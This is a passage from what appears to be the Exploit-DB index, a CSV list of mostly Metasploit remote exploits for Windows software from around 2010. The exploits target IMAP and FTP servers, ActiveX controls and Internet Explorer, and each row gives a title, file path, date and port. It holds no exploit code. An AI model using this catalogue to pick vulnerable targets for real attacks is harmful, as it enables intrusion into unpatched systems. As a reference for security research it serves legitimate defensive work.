-16460,exploits/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16461,exploits/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16462,exploits/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16463,exploits/windows/remote/16463.rb,"PuTTy.exe 0.53 - Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16464,exploits/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16465,exploits/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16466,exploits/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote, -16467,exploits/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,windows,remote, -16468,exploits/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16469,exploits/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16470,exploits/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16471,exploits/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote, -16472,exploits/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,windows,remote, -16473,exploits/windows/remote/16473.rb,"Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16474,exploits/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote, -16475,exploits/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16476,exploits/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16478,exploits/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16479,exploits/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16480,exploits/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16481,exploits/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote, -16482,exploits/windows/remote/16482.rb,"Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16483,exploits/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16484,exploits/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16485,exploits/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16486,exploits/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP Authenticate Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16487,exploits/windows/remote/16487.rb,"Ipswitch IMail Server - IMAP SEARCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16488,exploits/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16489,exploits/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16490,exploits/windows/remote/16490.rb,"UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16491,exploits/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)",2009-12-06,Metasploit,windows,remote, -16492,exploits/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote, -16493,exploits/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download (Metasploit)",2010-12-01,Metasploit,windows,remote, -16494,exploits/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Remote Stack Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote, -16495,exploits/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit)",2011-01-22,Metasploit,multiple,remote, -16496,exploits/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16497,exploits/windows/remote/16497.rb,"RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16498,exploits/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16499,exploits/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote, -16500,exploits/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote, -16502,exploits/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16505,exploits/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16506,exploits/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote, -16507,exploits/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote, -16508,exploits/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote, -16509,exploits/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' (Metasploit)",2011-02-22,Metasploit,windows,remote, -16510,exploits/windows/remote/16510.rb,"McAfee Subscription Manager - Remote Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16511,exploits/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16512,exploits/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote, -16513,exploits/windows/remote/16513.rb,"Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16514,exploits/windows/remote/16514.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote, -16515,exploits/windows/remote/16515.rb,"Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit)",2010-05-26,Metasploit,windows,remote, -16516,exploits/windows/remote/16516.rb,"Microsoft WMI Administration Tools - ActiveX Buffer Overflow (Metasploit)",2011-01-14,Metasploit,windows,remote, -16517,exploits/windows/remote/16517.rb,"IBM Access Support - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16518,exploits/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote, -16519,exploits/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16520,exploits/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16521,exploits/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)",2010-05-09,Metasploit,windows,remote, -16522,exploits/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16523,exploits/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16524,exploits/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16525,exploits/windows/remote/16525.rb,"AOL Instant Messenger AIM - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16526,exploits/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)",2010-08-12,Metasploit,windows,remote, -16527,exploits/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,windows,remote, -16528,exploits/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16530,exploits/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16532,exploits/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)",2010-07-03,Metasploit,windows,remote, -16533,exploits/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)",2011-02-08,Metasploit,windows,remote, -16534,exploits/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16535,exploits/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16536,exploits/windows/remote/16536.rb,"Green Dam - URL Processing Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote, -16537,exploits/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)",2010-07-20,Metasploit,windows,remote, -16538,exploits/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16539,exploits/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16540,exploits/windows/remote/16540.rb,"Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote, -16541,exploits/windows/remote/16541.rb,"Microsoft Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,windows,remote, -16542,exploits/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16543,exploits/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16544,exploits/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote, -16545,exploits/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16547,exploits/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)",2010-07-12,Metasploit,windows,remote, -16548,exploits/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16549,exploits/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,windows,remote, -16551,exploits/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)",2011-01-20,Metasploit,windows,remote, -16552,exploits/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote, -16553,exploits/windows/remote/16553.rb,"BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16554,exploits/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote, -16555,exploits/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)",2010-07-12,Metasploit,windows,remote, -16557,exploits/windows/remote/16557.rb,"Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16558,exploits/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote, -16559,exploits/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16560,exploits/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote, -16561,exploits/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16563,exploits/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16564,exploits/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)",2010-07-03,Metasploit,windows,remote, -16565,exploits/windows/remote/16565.rb,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16566,exploits/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote, -16567,exploits/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16568,exploits/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16569,exploits/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16570,exploits/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute (Metasploit)",2010-09-20,Metasploit,windows,remote, -16571,exploits/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16573,exploits/windows/remote/16573.rb,"Macrovision Installshield Update Service - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16574,exploits/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)",2010-09-21,Metasploit,windows,remote, -16575,exploits/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16576,exploits/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16577,exploits/windows/remote/16577.rb,"CA BrightStor ARCserve Backup - 'AddColumn()' ActiveX Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16578,exploits/windows/remote/16578.rb,"Microsoft Internet Explorer - 'createTextRange()' Code Execution (MS06-013) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16579,exploits/windows/remote/16579.rb,"Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16580,exploits/windows/remote/16580.rb,"HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16581,exploits/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)",2010-08-25,Metasploit,windows,remote, -16582,exploits/windows/remote/16582.rb,"Symantec BackupExec Calendar Control - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16583,exploits/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16584,exploits/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote, -16585,exploits/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,windows,remote, -16586,exploits/windows/remote/16586.rb,"RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16587,exploits/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote, -16588,exploits/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16590,exploits/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)",2010-12-14,Metasploit,windows,remote, -16591,exploits/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control 'ConvertFile()' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16592,exploits/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16594,exploits/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote, -16595,exploits/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16597,exploits/windows/remote/16597.rb,"Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote, -16598,exploits/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote, -16599,exploits/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote, -16600,exploits/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote, -16601,exploits/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16602,exploits/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote, -16603,exploits/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control 'SetFormatLikeSample()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16604,exploits/windows/remote/16604.rb,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16605,exploits/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)",2010-09-20,Metasploit,windows,remote, -16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16608,exploits/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16609,exploits/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16610,exploits/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16611,exploits/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16612,exploits/windows/remote/16612.rb,"Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16613,exploits/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16616,exploits/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16630,exploits/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16635,exploits/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16638,exploits/windows/remote/16638.rb,"DjVu - 'DjVu_ActiveX_MSOffice.dll' ActiveX Component Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote, -16639,exploits/windows/remote/16639.rb,"McAfee Remediation Client - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16641,exploits/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote, -16647,exploits/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16649,exploits/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)",2010-09-25,Metasploit,windows,remote, -41783,exploits/multiple/remote/41783.txt,"Apache Tomcat 6/7/8/9 - Information Disclosure",2017-04-04,justpentest,multiple,remote, -16685,exploits/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote, -16690,exploits/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 -16691,exploits/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 -16692,exploits/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 -16693,exploits/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 -16694,exploits/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 -16695,exploits/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 -16696,exploits/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 -16697,exploits/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80 -16698,exploits/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16701,exploits/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,3306 -16702,exploits/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 -16703,exploits/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote, -16704,exploits/windows/remote/16704.rb,"LeapFTP 3.0.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16705,exploits/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16706,exploits/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16707,exploits/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16708,exploits/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16709,exploits/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote, -16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 -16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote, -16714,exploits/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100 -16715,exploits/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 -16716,exploits/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16717,exploits/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16718,exploits/windows/remote/16718.rb,"Xlink FTP Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16719,exploits/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21 -16720,exploits/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16721,exploits/windows/remote/16721.rb,"FileWrangler 5.30 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16722,exploits/windows/remote/16722.rb,"Xlink FTP Client - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote, -16724,exploits/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16725,exploits/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Remote Stack Buffer Overflow (PWD) 